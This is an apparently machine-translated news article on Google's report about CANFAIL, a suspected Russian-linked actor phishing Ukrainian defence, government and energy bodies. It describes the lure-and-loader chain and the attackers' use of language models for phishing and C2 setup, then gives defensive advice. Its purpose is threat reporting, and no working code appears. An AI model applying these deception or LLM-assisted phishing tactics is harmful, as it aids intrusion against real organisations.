CANFAIL the threat that IA uses to expand attacks on energy defense and governments

Google Threat Intelligence Group (GTIG) has identified an undocumented threat actor, responsible for a series of intrusions directed against Ukrainian organizations and grouped under the name CANFAIL. According to the Google team, this set of operations shows signs of a possible link with Russian intelligence services, and its main focus includes defence entities, armed forces, government agencies and energy companies at the regional and national levels.

The pattern of activity, however, is not limited to these traditional targets. GTIG notes an increasing interest on the part of the operator in aerospace companies, manufacturers with military and drones ties, nuclear and chemical research centres, as well as in international organizations involved in conflict monitoring and humanitarian aid. This range of objectives gives a broader intention: to collect sensitive intelligence with both military and civilian applications.

What differentiates CANFAIL is not necessarily its absolute technical sophistication, but its ability to compensate for limitations by means of artificial intelligence tools. The Google report explains that the group uses language models for specific tasks: to generate texts used in deception, to ask questions that facilitate the configuration of control and command infrastructure (C2), and to speed up the recognition phase. In other words, the use of LLM allows less experienced attackers to produce more credible lures and accelerate operations that previously required highly specialized personnel. Read more about the GTIG evaluation on the official Google Cloud blog ( Here.).

The phishing campaigns attributed to this actor have adopted an elementary but effective tactic: supplanting legitimate energy entities - both Ukrainian and some based in Romania - to convince recipients to open seemingly harmless documents. The messages contain links to Google Drive that hide a RAR file; inside is a double extension file designed to look like a PDF (e.g. nombre.pdf.js). When activated, that ofuscado JavaScript runs a PowerShell command that is intended to drive a charger into memory also on PowerShell, thus avoiding leaving devices easier to detect on disk. While the infection occurs, the victim sees a false dialog box with an error message, a coquette tactic to minimize suspicion and gain time.

The main technical component, CANFAIL, is therefore a chain of attack built to maximize the success of the deception and minimize the forensic footprint in the compromised systems. By combining JavaScript ofuscation, execution via PowerShell in memory and visual decoys that simulate failures, the campaign seeks persistent and discreet access to mail accounts and internal resources.

In addition, GTIG relates the actor to another previously attributed campaign known as PhantomCaptcha, which was described by SentinelOne researchers. This operation promoted false pages that guided victims to activate the infection chain and ended with the delivery of a WebSocket-based Trojan. For a wider picture of SentinelOne's research, see your research hub ( SentinelLabs), where technical analyses and alerts on emerging threats are published.

A worrying aspect of these tactics is the use of language models to improve social engineering techniques. Use LLMs to write highly customizable emails, generate lists of specific addresses by region and industry or design convincing phishing pages reduces the entry barrier for attackers with limited resources. Security institutions and equipment must look at this new variable: not only do they face operators with traditional tools, but also actors that amplify their effectiveness with automatic text generation capabilities. European bodies and cybersecurity agencies already analyse the impact of malicious use of IA on cyberspace; general reports and recommendations on risks of IA and cybersecurity can be consulted at the European Union Agency for Cybersecurity ( ENISA).

In practical terms, what can organizations do to reduce the risk posed by a threat like CANFAIL? First, strengthen the identity verification of sender and the analysis of links hosted in cloud services; many campaigns use Google Drive and similar platforms to hide malicious loads behind legitimate links. Second, harden scripts and telemetry execution policies that detect PowerShell processes that download or run code in memory. Third, implement multifactor authentication and monitor abnormal patterns of access to corporate email accounts. For practical guides on how to mitigate phishing and initial commitments it is appropriate to review resources from national agencies, such as US-CERT's advice on social engineering and phishing ( in this link).

The emergence of actors that combine conventional techniques with IA-assisted capabilities forces a change in the defensive mentality: it is no longer enough to block technical exploits; more polished and automated social manipulation campaigns must be anticipated. Organizations in the orbit of the Ukrainian conflict, and those with commercial or logistical relations in the region, should increase their monitoring and implement specific controls on mail management and the use of file sharing tools.

In short, CANFAIL illustrates a broader trend: the democratization of offensive capacities through automated content generation tools. Although this actor seems less sophisticated than other groups attributed to states, its adoption of LLMs and its focus on strategic objectives make it a real risk to critical infrastructure and to the integrity of humanitarian and monitoring operations. Keeping informed about intelligence reports and applying basic cyberhygiene controls are essential measures to complicate the work of these attackers.